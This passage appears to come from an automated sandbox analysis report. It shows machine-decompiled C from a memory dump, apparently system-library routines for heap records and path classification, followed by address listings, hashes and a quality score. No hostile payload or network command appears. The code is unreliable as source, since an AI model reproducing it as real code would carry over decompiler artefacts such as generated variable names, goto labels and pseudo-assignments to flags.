                                                                                                                                    														_t505 =  *(_t528 - 0xd4);
                                                                                                                                    														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                                                                    														 *(_t528 - 0x78) = _t479;
                                                                                                                                    														_t362 =  *(_t528 - 0x80);
                                                                                                                                    														__eflags = _t362;
                                                                                                                                    														if(_t362 != 0) {
                                                                                                                                    															_t222 = _t362 + 4;
                                                                                                                                    															 *_t222 =  *(_t362 + 4) | 1;
                                                                                                                                    															__eflags =  *_t222;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													__eflags =  *(_t528 - 0xb0);
                                                                                                                                    													if( *(_t528 - 0xb0) != 0) {
                                                                                                                                    														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                                                                    														_t458 = 0xb;
                                                                                                                                    														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                                                                    														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                                                                                    														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                                                                                    														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                                                                                    														E04B7FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                                                                                    														_t529 = _t529 + 0xc;
                                                                                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                    														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                                                                                    														 *(_t528 - 0x78) = _t479;
                                                                                                                                    														__eflags = _t505;
                                                                                                                                    														if(_t505 != 0) {
                                                                                                                                    															_t241 = _t505 + 4;
                                                                                                                                    															 *_t241 =  *(_t505 + 4) | 1;
                                                                                                                                    															__eflags =  *_t241;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													_t328 =  *(_t528 + 0x1c);
                                                                                                                                    													__eflags = _t328;
                                                                                                                                    													if(_t328 == 0) {
                                                                                                                                    														L87:
                                                                                                                                    														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                                                                                    														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                                                                                    														_t455 =  *(_t528 - 0xdc);
                                                                                                                                    														 *(_t427 + 0x14) = _t455;
                                                                                                                                    														_t480 =  *(_t528 - 0xa0);
                                                                                                                                    														_t517 = 3;
                                                                                                                                    														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                                                                                    														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                                                                                    															asm("rdtsc");
                                                                                                                                    															 *(_t427 + 0x3c) = _t480;
                                                                                                                                    														} else {
                                                                                                                                    															 *(_t427 + 0x3c) = _t455;
                                                                                                                                    														}
                                                                                                                                    														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                                                                                    														_t456 =  *[fs:0x18];
                                                                                                                                    														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                                                                                    														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                                                                                    														_t427 = 0;
                                                                                                                                    														__eflags = 0;
                                                                                                                                    														_t511 = 0x18;
                                                                                                                                    														goto L91;
                                                                                                                                    													} else {
                                                                                                                                    														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                                                                                    														__eflags = _t519;
                                                                                                                                    														 *(_t528 - 0x8c) = _t328;
                                                                                                                                    														do {
                                                                                                                                    															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                                                                                    															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                                                                                    															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                                                                                    															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                                                                                    															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                                                                                    															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                                                                                    																_t334 =  *_t519;
                                                                                                                                    															} else {
                                                                                                                                    																_t334 = 0;
                                                                                                                                    															}
                                                                                                                                    															_t336 = _t334 & 0x000000ff;
                                                                                                                                    															__eflags = _t336;
                                                                                                                                    															_t427 =  *(_t528 - 0x88);
                                                                                                                                    															if(_t336 == 0) {
                                                                                                                                    																_t481 = _t479 + _t506;
                                                                                                                                    																__eflags = _t481;
                                                                                                                                    																 *(_t528 - 0x78) = _t481;
                                                                                                                                    																E04B7F3E0(_t479 + _t427, _t457, _t506);
                                                                                                                                    																_t529 = _t529 + 0xc;
                                                                                                                                    															} else {
                                                                                                                                    																_t340 = _t336 - 1;
                                                                                                                                    																__eflags = _t340;
                                                                                                                                    																if(_t340 == 0) {
                                                                                                                                    																	E04B7F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                                                                                    																	_t529 = _t529 + 0xc;
                                                                                                                                    																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                                                                                    																} else {
                                                                                                                                    																	__eflags = _t340 == 0;
                                                                                                                                    																	if(_t340 == 0) {
                                                                                                                                    																		__eflags = _t506 - 8;
                                                                                                                                    																		if(_t506 == 8) {
                                                                                                                                    																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                                                                                    																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                                                                                    																		}
                                                                                                                                    																	}
                                                                                                                                    																}
                                                                                                                                    															}
                                                                                                                                    															_t339 = 0x10;
                                                                                                                                    															_t519 = _t519 + _t339;
                                                                                                                                    															_t263 = _t528 - 0x8c;
                                                                                                                                    															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                                                                                    															__eflags =  *_t263;
                                                                                                                                    															_t479 =  *(_t528 - 0x78);
                                                                                                                                    														} while ( *_t263 != 0);
                                                                                                                                    														goto L87;
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											} else {
                                                                                                                                    												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                                                                                    												 *(_t528 - 0xa2) = _t392;
                                                                                                                                    												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                                                                                    												__eflags = _t469;
                                                                                                                                    												while(1) {
                                                                                                                                    													 *(_t528 - 0xe4) = _t511;
                                                                                                                                    													__eflags = _t392;
                                                                                                                                    													_t393 = _t427;
                                                                                                                                    													if(_t392 != 0) {
                                                                                                                                    														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                                                                                    													}
                                                                                                                                    													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                                                                                    													__eflags = _t395;
                                                                                                                                    													if(_t395 == 0) {
                                                                                                                                    														_t511 = _t511 +  *_t469;
                                                                                                                                    														__eflags = _t511;
                                                                                                                                    													} else {
                                                                                                                                    														_t398 = _t395 - 1;
                                                                                                                                    														__eflags = _t398;
                                                                                                                                    														if(_t398 == 0) {
                                                                                                                                    															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                                                                    															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                                                                    														} else {
                                                                                                                                    															__eflags = _t398 == 1;
                                                                                                                                    															if(_t398 == 1) {
                                                                                                                                    																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                                                                    																_t402 =  *_t469 & 0x0000ffff;
                                                                                                                                    																 *(_t528 - 0xac) = _t402;
                                                                                                                                    																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                                                                    													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                                                                    														break;
                                                                                                                                    													}
                                                                                                                                    													_t397 =  *(_t528 - 0x88) + 1;
                                                                                                                                    													 *(_t528 - 0x88) = _t397;
                                                                                                                                    													_t469 = _t469 + 0x10;
                                                                                                                                    													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                                                                    													_t392 =  *(_t528 - 0xa2);
                                                                                                                                    													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                                                                    														continue;
                                                                                                                                    													}
                                                                                                                                    													goto L45;
                                                                                                                                    												}
                                                                                                                                    												_t475 = 0x216;
                                                                                                                                    												 *(_t528 - 0x74) = 0x216;
                                                                                                                                    												goto L45;
                                                                                                                                    											}
                                                                                                                                    										} else {
                                                                                                                                    											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                                                                    											goto L16;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    									_t491 = E04C04CAB(_t306, _t528 - 0xa4);
                                                                                                                                    									 *(_t528 - 0x74) = _t491;
                                                                                                                                    									__eflags = _t491;
                                                                                                                                    									if(_t491 != 0) {
                                                                                                                                    										goto L91;
                                                                                                                                    									} else {
                                                                                                                                    										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                                    										goto L20;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								L16:
                                                                                                                                    								 *(_t528 - 0x74) = 0x1069;
                                                                                                                                    								L93:
                                                                                                                                    								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                                                                    								 *(_t528 - 0xd0) = _t298;
                                                                                                                                    								_t474 = _t474 + _t511;
                                                                                                                                    								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                                                    								_t494 = 4;
                                                                                                                                    								__eflags = _t298 - _t494;
                                                                                                                                    								if(_t298 >= _t494) {
                                                                                                                                    									goto L100;
                                                                                                                                    								}
                                                                                                                                    								_t494 =  *(_t528 - 0xcc);
                                                                                                                                    								_t435 = _t298;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t494[2] | _t494[3];
                                                                                                                                    							if((_t494[2] | _t494[3]) == 0) {
                                                                                                                                    								goto L15;
                                                                                                                                    							}
                                                                                                                                    							goto L12;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t301;
                                                                                                                                    						if(_t301 != 0) {
                                                                                                                                    							goto L92;
                                                                                                                                    						}
                                                                                                                                    						goto L10;
                                                                                                                                    						L92:
                                                                                                                                    						goto L93;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_push(0x57);
                                                                                                                                    					L101:
                                                                                                                                    					return E04B8D130(_t427, _t494, _t511);
                                                                                                                                    				}
                                                                                                                                    			}










































































                                                                                                                                    0x04c06000
                                                                                                                                    0x04c06004
                                                                                                                                    0x04c06012
                                                                                                                                    0x04c06012
                                                                                                                                    0x04c06018
                                                                                                                                    0x04c06019
                                                                                                                                    0x04c0601a
                                                                                                                                    0x04c0601b
                                                                                                                                    0x04c0601c
                                                                                                                                    0x04c06020
                                                                                                                                    0x04c06059
                                                                                                                                    0x04c0605c
                                                                                                                                    0x04c06061
                                                                                                                                    0x04c06061
                                                                                                                                    0x04c06022
                                                                                                                                    0x04c06022
                                                                                                                                    0x04c06022
                                                                                                                                    0x04c06025
                                                                                                                                    0x04c0602a
                                                                                                                                    0x04c0602b
                                                                                                                                    0x04c06031
                                                                                                                                    0x04c06037
                                                                                                                                    0x04c06038
                                                                                                                                    0x04c0603e
                                                                                                                                    0x04c06048
                                                                                                                                    0x04c06049
                                                                                                                                    0x04c0604a
                                                                                                                                    0x04c0604b
                                                                                                                                    0x04c0604c
                                                                                                                                    0x04c0604d
                                                                                                                                    0x04c06053
                                                                                                                                    0x04c06054
                                                                                                                                    0x04c06054
                                                                                                                                    0x04c06062
                                                                                                                                    0x04c06065
                                                                                                                                    0x04c06067
                                                                                                                                    0x04c0606a
                                                                                                                                    0x04c06070
                                                                                                                                    0x04c06075
                                                                                                                                    0x04c06076
                                                                                                                                    0x04c06081
                                                                                                                                    0x04c06087
                                                                                                                                    0x04c06095
                                                                                                                                    0x04c06099
                                                                                                                                    0x04c0609e
                                                                                                                                    0x04c060a4
                                                                                                                                    0x04c060ae
                                                                                                                                    0x04c060b0
                                                                                                                                    0x04c060b3
                                                                                                                                    0x04c060b6
                                                                                                                                    0x04c060b8
                                                                                                                                    0x04c060ba
                                                                                                                                    0x04c060ba
                                                                                                                                    0x04c060ba
                                                                                                                                    0x04c060ba
                                                                                                                                    0x04c060be
                                                                                                                                    0x04c060c0
                                                                                                                                    0x04c060c5
                                                                                                                                    0x04c060c5
                                                                                                                                    0x04c060c5
                                                                                                                                    0x04c060c6
                                                                                                                                    0x04c060cd
                                                                                                                                    0x04c06114
                                                                                                                                    0x04c060cf
                                                                                                                                    0x04c060cf
                                                                                                                                    0x04c060d4
                                                                                                                                    0x04c060d5
                                                                                                                                    0x04c060da
                                                                                                                                    0x04c060db
                                                                                                                                    0x04c060e1
                                                                                                                                    0x04c060e2
                                                                                                                                    0x04c060e8
                                                                                                                                    0x04c060f8
                                                                                                                                    0x04c060fd
                                                                                                                                    0x04c060fe
                                                                                                                                    0x04c06102
                                                                                                                                    0x04c06104
                                                                                                                                    0x04c06107
                                                                                                                                    0x04c06109
                                                                                                                                    0x04c0610b
                                                                                                                                    0x04c0610b
                                                                                                                                    0x04c0610b
                                                                                                                                    0x04c0610b
                                                                                                                                    0x04c0610f
                                                                                                                                    0x04c0610f
                                                                                                                                    0x04c06117
                                                                                                                                    0x04c0611a
                                                                                                                                    0x04c0611f
                                                                                                                                    0x04c06125
                                                                                                                                    0x04c06134
                                                                                                                                    0x04c06139
                                                                                                                                    0x04c0613f
                                                                                                                                    0x04c06146
                                                                                                                                    0x04c06148
                                                                                                                                    0x04c0614b
                                                                                                                                    0x04c0614d
                                                                                                                                    0x04c0614f
                                                                                                                                    0x04c0614f
                                                                                                                                    0x04c0614f
                                                                                                                                    0x04c0614f
                                                                                                                                    0x04c06153
                                                                                                                                    0x04c06159
                                                                                                                                    0x04c06159
                                                                                                                                    0x04c0615c
                                                                                                                                    0x04c06163
                                                                                                                                    0x04c06169
                                                                                                                                    0x04c0616c
                                                                                                                                    0x04c06172
                                                                                                                                    0x04c06181
                                                                                                                                    0x04c06186
                                                                                                                                    0x04c06187
                                                                                                                                    0x04c0618b
                                                                                                                                    0x04c06191
                                                                                                                                    0x04c06195
                                                                                                                                    0x04c061a3
                                                                                                                                    0x04c061bb
                                                                                                                                    0x04c061c0
                                                                                                                                    0x04c061c3
                                                                                                                                    0x04c061cc
                                                                                                                                    0x04c061d0
                                                                                                                                    0x04c061dc
                                                                                                                                    0x04c061de
                                                                                                                                    0x04c061e1
                                                                                                                                    0x04c061e4
                                                                                                                                    0x04c061e6
                                                                                                                                    0x04c061e8
                                                                                                                                    0x04c061e8
                                                                                                                                    0x04c061e8
                                                                                                                                    0x04c061e8
                                                                                                                                    0x04c061e6
                                                                                                                                    0x04c061ec
                                                                                                                                    0x04c061f3
                                                                                                                                    0x04c06203
                                                                                                                                    0x04c06209
                                                                                                                                    0x04c0620a
                                                                                                                                    0x04c06216
                                                                                                                                    0x04c0621d
                                                                                                                                    0x04c06227
                                                                                                                                    0x04c06241
                                                                                                                                    0x04c06246
                                                                                                                                    0x04c0624c
                                                                                                                                    0x04c06257
                                                                                                                                    0x04c06259
                                                                                                                                    0x04c0625c
                                                                                                                                    0x04c0625e
                                                                                                                                    0x04c06260
                                                                                                                                    0x04c06260
                                                                                                                                    0x04c06260
                                                                                                                                    0x04c06260
                                                                                                                                    0x04c0625e
                                                                                                                                    0x04c06264
                                                                                                                                    0x04c06267
                                                                                                                                    0x04c06269
                                                                                                                                    0x04c06315
                                                                                                                                    0x04c06315
                                                                                                                                    0x04c0631b
                                                                                                                                    0x04c0631e
                                                                                                                                    0x04c06324
                                                                                                                                    0x04c06327
                                                                                                                                    0x04c0632f
                                                                                                                                    0x04c06330
                                                                                                                                    0x04c06333
                                                                                                                                    0x04c0633a
                                                                                                                                    0x04c0633c
                                                                                                                                    0x04c06335
                                                                                                                                    0x04c06335
                                                                                                                                    0x04c06335
                                                                                                                                    0x04c0633f
                                                                                                                                    0x04c06342
                                                                                                                                    0x04c0634c
                                                                                                                                    0x04c06352
                                                                                                                                    0x04c06355
                                                                                                                                    0x04c06355
                                                                                                                                    0x04c06359
                                                                                                                                    0x00000000
                                                                                                                                    0x04c0626f
                                                                                                                                    0x04c06275
                                                                                                                                    0x04c06275
                                                                                                                                    0x04c06278
                                                                                                                                    0x04c0627e
                                                                                                                                    0x04c0627e
                                                                                                                                    0x04c06281
                                                                                                                                    0x04c06287
                                                                                                                                    0x04c0628d
                                                                                                                                    0x04c06298
                                                                                                                                    0x04c0629c
                                                                                                                                    0x04c062a2
                                                                                                                                    0x04c0629e
                                                                                                                                    0x04c0629e
                                                                                                                                    0x04c0629e
                                                                                                                                    0x04c062a7
                                                                                                                                    0x04c062a7
                                                                                                                                    0x04c062aa
                                                                                                                                    0x04c062b0
                                                                                                                                    0x04c062f0
                                                                                                                                    0x04c062f0

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7739f111f38cbe446ffe6c7f1f19c721603e46857ed02140671a8f482f5aefb4
                                                                                                                                    • Instruction ID: 300415dd94800b9c0439a6795423950e4c19429c50c8e9c3bb4dbd65ea47b70d
                                                                                                                                    • Opcode Fuzzy Hash: 7739f111f38cbe446ffe6c7f1f19c721603e46857ed02140671a8f482f5aefb4
                                                                                                                                    • Instruction Fuzzy Hash: 9C425E75A00219CFDB24CF68C880BA9B7B2FF45304F15C1AAD95DEB281D774AA95CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E04B54120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				void* _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				char _v532;
                                                                                                                                    				char _v540;
                                                                                                                                    				signed short _v544;
                                                                                                                                    				signed int _v548;
                                                                                                                                    				signed short* _v552;
                                                                                                                                    				signed short _v556;
                                                                                                                                    				signed short* _v560;
                                                                                                                                    				signed short* _v564;
                                                                                                                                    				signed short* _v568;
                                                                                                                                    				void* _v570;
                                                                                                                                    				signed short* _v572;
                                                                                                                                    				signed short _v576;
                                                                                                                                    				signed int _v580;
                                                                                                                                    				char _v581;
                                                                                                                                    				void* _v584;
                                                                                                                                    				unsigned int _v588;
                                                                                                                                    				signed short* _v592;
                                                                                                                                    				void* _v597;
                                                                                                                                    				void* _v600;
                                                                                                                                    				void* _v604;
                                                                                                                                    				void* _v609;
                                                                                                                                    				void* _v616;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				unsigned int _t161;
                                                                                                                                    				signed int _t162;
                                                                                                                                    				unsigned int _t163;
                                                                                                                                    				void* _t169;
                                                                                                                                    				signed short _t173;
                                                                                                                                    				signed short _t177;
                                                                                                                                    				signed short _t181;
                                                                                                                                    				unsigned int _t182;
                                                                                                                                    				signed int _t185;
                                                                                                                                    				signed int _t213;
                                                                                                                                    				signed int _t225;
                                                                                                                                    				short _t233;
                                                                                                                                    				signed char _t234;
                                                                                                                                    				signed int _t242;
                                                                                                                                    				signed int _t243;
                                                                                                                                    				signed int _t244;
                                                                                                                                    				signed int _t245;
                                                                                                                                    				signed int _t250;
                                                                                                                                    				void* _t251;
                                                                                                                                    				signed short* _t254;
                                                                                                                                    				void* _t255;
                                                                                                                                    				signed int _t256;
                                                                                                                                    				void* _t257;
                                                                                                                                    				signed short* _t260;
                                                                                                                                    				signed short _t265;
                                                                                                                                    				signed short* _t269;
                                                                                                                                    				signed short _t271;
                                                                                                                                    				signed short** _t272;
                                                                                                                                    				signed short* _t275;
                                                                                                                                    				signed short _t282;
                                                                                                                                    				signed short _t283;
                                                                                                                                    				signed short _t290;
                                                                                                                                    				signed short _t299;
                                                                                                                                    				signed short _t307;
                                                                                                                                    				signed int _t308;
                                                                                                                                    				signed short _t311;
                                                                                                                                    				signed short* _t315;
                                                                                                                                    				signed short _t316;
                                                                                                                                    				void* _t317;
                                                                                                                                    				void* _t319;
                                                                                                                                    				signed short* _t321;
                                                                                                                                    				void* _t322;
                                                                                                                                    				void* _t323;
                                                                                                                                    				unsigned int _t324;
                                                                                                                                    				signed int _t325;
                                                                                                                                    				void* _t326;
                                                                                                                                    				signed int _t327;
                                                                                                                                    				signed int _t329;
                                                                                                                                    
                                                                                                                                    				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t329;
                                                                                                                                    				_t157 = _a8;
                                                                                                                                    				_t321 = _a4;
                                                                                                                                    				_t315 = __edx;
                                                                                                                                    				_v548 = __ecx;
                                                                                                                                    				_t305 = _a20;
                                                                                                                                    				_v560 = _a12;
                                                                                                                                    				_t260 = _a16;
                                                                                                                                    				_v564 = __edx;
                                                                                                                                    				_v580 = _a8;
                                                                                                                                    				_v572 = _t260;
                                                                                                                                    				_v544 = _a20;
                                                                                                                                    				if( *__edx <= 8) {
                                                                                                                                    					L3:
                                                                                                                                    					if(_t260 != 0) {
                                                                                                                                    						 *_t260 = 0;
                                                                                                                                    					}
                                                                                                                                    					_t254 =  &_v532;
                                                                                                                                    					_v588 = 0x208;
                                                                                                                                    					if((_v548 & 0x00000001) != 0) {
                                                                                                                                    						_v556 =  *_t315;
                                                                                                                                    						_v552 = _t315[2];
                                                                                                                                    						_t161 = E04B6F232( &_v556);
                                                                                                                                    						_t316 = _v556;
                                                                                                                                    						_v540 = _t161;
                                                                                                                                    						goto L17;
                                                                                                                                    					} else {
                                                                                                                                    						_t306 = 0x208;
                                                                                                                                    						_t298 = _t315;
                                                                                                                                    						_t316 = E04B56E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                                                                                    						if(_t316 == 0) {
                                                                                                                                    							L68:
                                                                                                                                    							_t322 = 0xc0000033;
                                                                                                                                    							goto L39;
                                                                                                                                    						} else {
                                                                                                                                    							while(_v581 == 0) {
                                                                                                                                    								_t233 = _v588;
                                                                                                                                    								if(_t316 > _t233) {
                                                                                                                                    									_t234 = _v548;
                                                                                                                                    									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                                                                                    										_t254 = L04B54620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                                                                                    										if(_t254 == 0) {
                                                                                                                                    											_t169 = 0xc0000017;
                                                                                                                                    										} else {
                                                                                                                                    											_t298 = _v564;
                                                                                                                                    											_v588 = _t316;
                                                                                                                                    											_t306 = _t316;
                                                                                                                                    											_t316 = E04B56E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                                                                                    											if(_t316 != 0) {
                                                                                                                                    												continue;
                                                                                                                                    											} else {
                                                                                                                                    												goto L68;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										goto L90;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									_v556 = _t316;
                                                                                                                                    									 *((short*)(_t329 + 0x32)) = _t233;
                                                                                                                                    									_v552 = _t254;
                                                                                                                                    									if(_t316 < 2) {
                                                                                                                                    										L11:
                                                                                                                                    										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                                                                                    											_t161 = 5;
                                                                                                                                    										} else {
                                                                                                                                    											if(_t316 < 6) {
                                                                                                                                    												L87:
                                                                                                                                    												_t161 = 3;
                                                                                                                                    											} else {
                                                                                                                                    												_t242 = _t254[2] & 0x0000ffff;
                                                                                                                                    												if(_t242 != 0x5c) {
                                                                                                                                    													if(_t242 == 0x2f) {
                                                                                                                                    														goto L16;
                                                                                                                                    													} else {
                                                                                                                                    														goto L87;
                                                                                                                                    													}
                                                                                                                                    													goto L101;
                                                                                                                                    												} else {
                                                                                                                                    													L16:
                                                                                                                                    													_t161 = 2;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										_t243 =  *_t254 & 0x0000ffff;
                                                                                                                                    										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                                                                                    											if(_t316 < 4) {
                                                                                                                                    												L81:
                                                                                                                                    												_t161 = 4;
                                                                                                                                    												goto L17;
                                                                                                                                    											} else {
                                                                                                                                    												_t244 = _t254[1] & 0x0000ffff;
                                                                                                                                    												if(_t244 != 0x5c) {
                                                                                                                                    													if(_t244 == 0x2f) {
                                                                                                                                    														goto L60;
                                                                                                                                    													} else {
                                                                                                                                    														goto L81;
                                                                                                                                    													}
                                                                                                                                    												} else {
                                                                                                                                    													L60:
                                                                                                                                    													if(_t316 < 6) {
                                                                                                                                    														L83:
                                                                                                                                    														_t161 = 1;
                                                                                                                                    														goto L17;
                                                                                                                                    													} else {
                                                                                                                                    														_t245 = _t254[2] & 0x0000ffff;
                                                                                                                                    														if(_t245 != 0x2e) {
                                                                                                                                    															if(_t245 == 0x3f) {
                                                                                                                                    																goto L62;
                                                                                                                                    															} else {
                                                                                                                                    																goto L83;
                                                                                                                                    															}
                                                                                                                                    														} else {
                                                                                                                                    															L62:
                                                                                                                                    															if(_t316 < 8) {
                                                                                                                                    																L85:
                                                                                                                                    																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                                                                                    																goto L17;
                                                                                                                                    															} else {
                                                                                                                                    																_t250 = _t254[3] & 0x0000ffff;
                                                                                                                                    																if(_t250 != 0x5c) {
                                                                                                                                    																	if(_t250 == 0x2f) {
                                                                                                                                    																		goto L64;
                                                                                                                                    																	} else {
                                                                                                                                    																		goto L85;
                                                                                                                                    																	}
                                                                                                                                    																} else {
                                                                                                                                    																	L64:
                                                                                                                                    																	_t161 = 6;
                                                                                                                                    																	goto L17;
                                                                                                                                    																}
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    											goto L101;
                                                                                                                                    										} else {
                                                                                                                                    											goto L11;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    									L17:
                                                                                                                                    									if(_t161 != 2) {
                                                                                                                                    										_t162 = _t161 - 1;
                                                                                                                                    										if(_t162 > 5) {
                                                                                                                                    											goto L18;
                                                                                                                                    										} else {
                                                                                                                                    											switch( *((intOrPtr*)(_t162 * 4 +  &M04B545F8))) {
                                                                                                                                    												case 0:
                                                                                                                                    													_v568 = 0x4b11078;
                                                                                                                                    													__eax = 2;
                                                                                                                                    													goto L20;
                                                                                                                                    												case 1:
                                                                                                                                    													goto L18;
                                                                                                                                    												case 2:
                                                                                                                                    													_t163 = 4;
                                                                                                                                    													goto L19;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										goto L41;
                                                                                                                                    									} else {
                                                                                                                                    										L18:
                                                                                                                                    										_t163 = 0;
                                                                                                                                    										L19:
                                                                                                                                    										_v568 = 0x4b111c4;
                                                                                                                                    									}
                                                                                                                                    									L20:
                                                                                                                                    									_v588 = _t163;
                                                                                                                                    									_v564 = _t163 + _t163;
                                                                                                                                    									_t306 =  *_v568 & 0x0000ffff;
                                                                                                                                    									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                                                                    									_v576 = _t265;
                                                                                                                                    									if(_t265 > 0xfffe) {
                                                                                                                                    										L90:
                                                                                                                                    										_t322 = 0xc0000106;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t321 != 0) {
                                                                                                                                    											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                                                                    												if(_v580 != 0) {
                                                                                                                                    													goto L23;
                                                                                                                                    												} else {
                                                                                                                                    													_t322 = 0xc0000106;
                                                                                                                                    													goto L39;
                                                                                                                                    												}
                                                                                                                                    											} else {
                                                                                                                                    												_t177 = _t306;
                                                                                                                                    												goto L25;
                                                                                                                                    											}
                                                                                                                                    											goto L101;
                                                                                                                                    										} else {
                                                                                                                                    											if(_v580 == _t321) {
                                                                                                                                    												_t322 = 0xc000000d;
                                                                                                                                    											} else {
                                                                                                                                    												L23:
                                                                                                                                    												_t173 = L04B54620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                                                                    												_t269 = _v592;
                                                                                                                                    												_t269[2] = _t173;
                                                                                                                                    												if(_t173 == 0) {
                                                                                                                                    													_t322 = 0xc0000017;
                                                                                                                                    												} else {
                                                                                                                                    													_t316 = _v556;
                                                                                                                                    													 *_t269 = 0;
                                                                                                                                    													_t321 = _t269;
                                                                                                                                    													_t269[1] = _v576;
                                                                                                                                    													_t177 =  *_v568 & 0x0000ffff;
                                                                                                                                    													L25:
                                                                                                                                    													_v580 = _t177;
                                                                                                                                    													if(_t177 == 0) {
                                                                                                                                    														L29:
                                                                                                                                    														_t307 =  *_t321 & 0x0000ffff;
                                                                                                                                    													} else {
                                                                                                                                    														_t290 =  *_t321 & 0x0000ffff;
                                                                                                                                    														_v576 = _t290;
                                                                                                                                    														_t310 = _t177 & 0x0000ffff;
                                                                                                                                    														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
